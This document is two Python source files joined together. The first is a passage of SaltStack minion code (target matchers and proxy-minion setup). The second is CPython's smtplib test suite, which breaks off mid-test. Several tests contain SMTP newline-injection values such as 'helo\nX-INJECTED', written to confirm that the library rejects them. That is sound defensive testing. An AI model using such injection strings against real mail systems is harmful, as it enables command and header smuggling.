return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: %s', tgt)
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.data.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: %s', tgt)
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.data.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(six.text_type(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: %s', tgt)
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.data.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: %s', tgt)
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.data.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: %s', tgt)
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.data.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on IP address or CIDR notation
'''
try:
# Target is an address?
tgt = ipaddress.ip_address(tgt)
except: # pylint: disable=bare-except
try:
# Target is a network?
tgt = ipaddress.ip_network(tgt)
except: # pylint: disable=bare-except
log.error('Invalid IP/CIDR target: %s', tgt)
return []
proto = 'ipv{0}'.format(tgt.version)
grains = self.opts['grains']
if proto not in grains:
match = False
elif isinstance(tgt, (ipaddress.IPv4Address, ipaddress.IPv6Address)):
match = six.text_type(tgt) in grains[proto]
else:
match = salt.utils.network.in_subnet(tgt, grains[proto])
return match
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: %s', exc)
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
log.error('Compound target received that is neither string, list nor tuple')
return False
log.debug('compound_match: %s ? %s', self.opts['id'], tgt)
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'N': None, # Nodegroups should already be expanded
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
if isinstance(tgt, six.string_types):
words = tgt.split()
else:
words = tgt
for word in words:
target_info = salt.utils.minions.parse_target(word)
# Easy check first
if word in opers:
if results:
if results[-1] == '(' and word in ('and', 'or'):
log.error('Invalid beginning operator after "(": %s', word)
return False
if word == 'not':
if not results[-1] in ('and', 'or', '('):
results.append('and')
results.append(word)
else:
# seq start with binary oper, fail
if word not in ['(', 'not']:
log.error('Invalid beginning operator: %s', word)
return False
results.append(word)
elif target_info and target_info['engine']:
if 'N' == target_info['engine']:
# Nodegroups should already be expanded/resolved to other engines
log.error(
'Detected nodegroup expansion failure of "%s"', word)
return False
engine = ref.get(target_info['engine'])
if not engine:
# If an unknown engine is called at any time, fail out
log.error(
'Unrecognized target engine "%s" for target '
'expression "%s"', target_info['engine'], word
)
return False
engine_args = [target_info['pattern']]
engine_kwargs = {}
if target_info['delimiter']:
engine_kwargs['delimiter'] = target_info['delimiter']
results.append(
six.text_type(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
)
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(six.text_type(self.glob_match(word)))
results = ' '.join(results)
log.debug('compound_match %s ? "%s" => "%s"', self.opts['id'], tgt, results)
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error(
'Invalid compound target: %s for results: %s', tgt, results)
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinionManager(MinionManager):
'''
Create the multi-minion interface but for proxy minions
'''
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return ProxyMinion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check Minion._post_master_init
to see if those changes need to be propagated.
ProxyMinions need a significantly different post master setup,
which is why the differences are not factored out into separate helper
functions.
'''
log.debug("subclassed _post_master_init")
if self.connected:
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = 'No proxy key found in pillar or opts for id ' + self.opts['id'] + '. ' + \
'Check your pillar/opts configuration and contents. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
if self.opts.get('proxy_merge_pillar_in_opts'):
# Override proxy opts with pillar data when the user required.
self.opts = salt.utils.dictupdate.merge(self.opts,
self.opts['pillar'],
strategy=self.opts.get('proxy_merge_pillar_in_opts_strategy'),
merge_lists=self.opts.get('proxy_deep_merge_pillar_in_opts', False))
elif self.opts.get('proxy_mines_pillar'):
# Even when not required, some details such as mine configuration
# should be merged anyway whenever possible.
if 'mine_interval' in self.opts['pillar']:
self.opts['mine_interval'] = self.opts['pillar']['mine_interval']
if 'mine_functions' in self.opts['pillar']:
general_proxy_mines = self.opts.get('mine_functions', [])
specific_proxy_mines = self.opts['pillar']['mine_functions']
try:
self.opts['mine_functions'] = general_proxy_mines + specific_proxy_mines
except TypeError as terr:
log.error('Unable to merge mine functions from the pillar in the opts, for proxy {}'.format(
self.opts['id']))
fq_proxyname = self.opts['proxy']['proxytype']
# Need to load the modules so they get all the dunder variables
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv'])
# Pull in the utils
self.utils = salt.loader.utils(self.opts)
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts, utils=self.utils)
# And re-load the modules so the __proxy__ variable gets injected
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.proxy.pack['__utils__'] = self.utils
# Reload all modules so all dunder variables are injected
self.proxy.reload_modules()
# Start engines here instead of in the Minion superclass __init__
# This is because we need to inject the __proxy__ variable but
# it is not setup until now.
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager, proxy=self.proxy)
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
proxy_init_fn = self.proxy[fq_proxyname + '.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.user.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
if self.connected and self.opts['pillar']:
# The pillar has changed due to the connection to the master.
# Reload the functions so that they can use the new pillar data.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
if hasattr(self, 'schedule'):
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')],
proxy=self.proxy)
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
# proxy keepalive
proxy_alive_fn = fq_proxyname+'.alive'
if (proxy_alive_fn in self.proxy
and 'status.proxy_reconnect' in self.functions
and self.opts.get('proxy_keep_alive', True)):
# if `proxy_keep_alive` is either not specified, either set to False does not retry reconnecting
self.schedule.add_job({
'__proxy_keepalive':
{
'function': 'status.proxy_reconnect',
'minutes': self.opts.get('proxy_keep_alive_interval', 1), # by default, check once per minute
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {
'proxy_name': fq_proxyname
}
}
}, persist=True)
self.schedule.enable_schedule()
else:
self.schedule.delete_job('__proxy_keepalive', persist=True)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv='base')
self.grains_cache = self.opts['grains']
self.ready = True
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
# Need to load the modules so they get all the dunder variables
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
# Pull in the utils
minion_instance.utils = salt.loader.utils(minion_instance.opts)
# Then load the proxy module
minion_instance.proxy = salt.loader.proxy(minion_instance.opts, utils=minion_instance.utils)
# And re-load the modules so the __proxy__ variable gets injected
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
minion_instance.functions.pack['__proxy__'] = minion_instance.proxy
minion_instance.proxy.pack['__salt__'] = minion_instance.functions
minion_instance.proxy.pack['__ret__'] = minion_instance.returners
minion_instance.proxy.pack['__pillar__'] = minion_instance.opts['pillar']
# Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
minion_instance.utils = salt.loader.utils(minion_instance.opts, proxy=minion_instance.proxy)
minion_instance.proxy.pack['__utils__'] = minion_instance.utils
# Reload all modules so all dunder variables are injected
minion_instance.proxy.reload_modules()
fq_proxyname = opts['proxy']['proxytype']
proxy_init_fn = minion_instance.proxy[fq_proxyname + '.init']
proxy_init_fn(opts)
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.user.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
Minion._thread_multi_return(minion_instance, opts, data)
else:
Minion._thread_return(minion_instance, opts, data)
|
test_smtplib.py
|
import asyncore
import base64
import email.mime.text
from email.message import EmailMessage
from email.base64mime import body_encode as encode_base64
import email.utils
import hashlib
import hmac
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import textwrap
import threading
import unittest
from test import support, mock_socket
from test.support import hashlib_helper
from test.support import socket_helper
from test.support import threading_setup, threading_cleanup, join_thread
from unittest.mock import Mock
HOST = socket_helper.HOST
if sys.platform == 'darwin':
# select.poll returns a select.POLLHUP at the end of the tests
# on darwin, so just ignore it
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests:
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
# This method is no longer used but is retained for backward compatibility,
# so test to make sure it still works.
def testQuoteData(self):
teststr = "abc\n.jkl\rfoo\r\n..blue"
expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
client = self.client(HOST, self.port)
client.close()
def testSourceAddress(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
client = self.client(HOST, self.port,
source_address=('127.0.0.1',19876))
self.assertEqual(client.source_address, ('127.0.0.1', 19876))
client.close()
def testBasic2(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects, include port in host name
client = self.client("%s:%s" % (HOST, self.port))
client.close()
def testLocalHostName(self):
mock_socket.reply_with(b"220 Hola mundo")
# check that supplied local_hostname is used
client = self.client(HOST, self.port, local_hostname="testhost")
self.assertEqual(client.local_hostname, "testhost")
client.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(mock_socket.getdefaulttimeout())
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
client = self.client(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(client.sock.gettimeout(), 30)
client.close()
def testTimeoutNone(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
client = self.client(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(client.sock.gettimeout())
client.close()
def testTimeoutZero(self):
mock_socket.reply_with(b"220 Hola mundo")
with self.assertRaises(ValueError):
self.client(HOST, self.port, timeout=0)
def testTimeoutValue(self):
mock_socket.reply_with(b"220 Hola mundo")
client = self.client(HOST, self.port, timeout=30)
self.assertEqual(client.sock.gettimeout(), 30)
client.close()
def test_debuglevel(self):
mock_socket.reply_with(b"220 Hello world")
client = self.client()
client.set_debuglevel(1)
with support.captured_stderr() as stderr:
client.connect(HOST, self.port)
client.close()
expected = re.compile(r"^connect:", re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
def test_debuglevel_2(self):
mock_socket.reply_with(b"220 Hello world")
client = self.client()
client.set_debuglevel(2)
with support.captured_stderr() as stderr:
client.connect(HOST, self.port)
client.close()
expected = re.compile(r"^\d{2}:\d{2}:\d{2}\.\d{6} connect: ",
re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
class SMTPGeneralTests(GeneralTests, unittest.TestCase):
client = smtplib.SMTP
class LMTPGeneralTests(GeneralTests, unittest.TestCase):
client = smtplib.LMTP
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), "test requires Unix domain socket")
def testUnixDomainSocketTimeoutDefault(self):
local_host = '/some/local/lmtp/delivery/program'
mock_socket.reply_with(b"220 Hello world")
try:
client = self.client(local_host, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertIsNone(client.sock.gettimeout())
client.close()
def testTimeoutZero(self):
super().testTimeoutZero()
local_host = '/some/local/lmtp/delivery/program'
with self.assertRaises(ValueError):
self.client(local_host, timeout=0)
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Capture SMTPChannel debug output
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
decode_data=True)
# Keep a note of what server host and port were assigned
self.host, self.port = self.serv.socket.getsockname()[:2]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
# restore sys.stdout
sys.stdout = self.old_stdout
# restore DEBUGSTREAM
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def get_output_without_xpeer(self):
test_output = self.output.getvalue()
return re.sub(r'(.*?)^X-Peer:\s*\S+\n(.*)', r'\1\2',
test_output, flags=re.MULTILINE|re.DOTALL)
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.quit()
def testSourceAddress(self):
# connect
src_port = socket_helper.find_unused_port()
try:
smtp = smtplib.SMTP(self.host, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT,
source_address=(self.host, src_port))
self.addCleanup(smtp.close)
self.assertEqual(smtp.source_address, (self.host, src_port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to source port %d" % src_port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testELHO(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'\nSIZE 33554432\nHELP')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
# EXPN isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (502, b'EXPN not implemented')
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def test_issue43124_putcmd_escapes_newline(self):
# see: https://bugs.python.org/issue43124
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(ValueError) as exc:
smtp.putcmd('helo\nX-INJECTED')
self.assertIn("prohibited newline characters", str(exc.exception))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (252, b'Cannot VRFY user, but will accept message ' + \
b'and attempt delivery')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def test_issue43124_escape_localhostname(self):
# see: https://bugs.python.org/issue43124
# connect and send mail
m = 'wazzuuup\nlinetwo'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='hi\nX-INJECTED',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(ValueError) as exc:
smtp.sendmail("hi@me.com", "you@me.com", m)
self.assertIn(
"prohibited newline characters: ehlo hi\\nX-INJECTED",
str(exc.exception),
)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
debugout = smtpd.DEBUGSTREAM.getvalue()
self.assertNotIn("X-INJECTED", debugout)
def test_issue43124_escape_options(self):
# see: https://bugs.python.org/issue43124
# connect and send mail
m = 'wazzuuup\nlinetwo'
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail("hi@me.com", "you@me.com", m)
with self.assertRaises(ValueError) as exc:
smtp.mail("hi@me.com", ["X-OPTION\nX-INJECTED-1", "X-OPTION2\nX-INJECTED-2"])
msg = str(exc.exception)
self.assertIn("prohibited newline characters", msg)
self.assertIn("X-OPTION\\nX-INJECTED-1 X-OPTION2\\nX-INJECTED-2", msg)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
debugout = smtpd.DEBUGSTREAM.getvalue()
self.assertNotIn("X-OPTION", debugout)
self.assertNotIn("X-OPTION2", debugout)
self.assertNotIn("X-INJECTED-1", debugout)
self.assertNotIn("X-INJECTED-2", debugout)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds as figuring out
# exactly what IP address format is put there is not easy (and
# irrelevant to our test). Typically 127.0.0.1 or ::1, but it is
# not always the same as socket.gethostbyname(HOST). :(
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<warped@silly.walks.com>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
# The Bcc header should not be transmitted.
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'warped@silly.walks.com'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
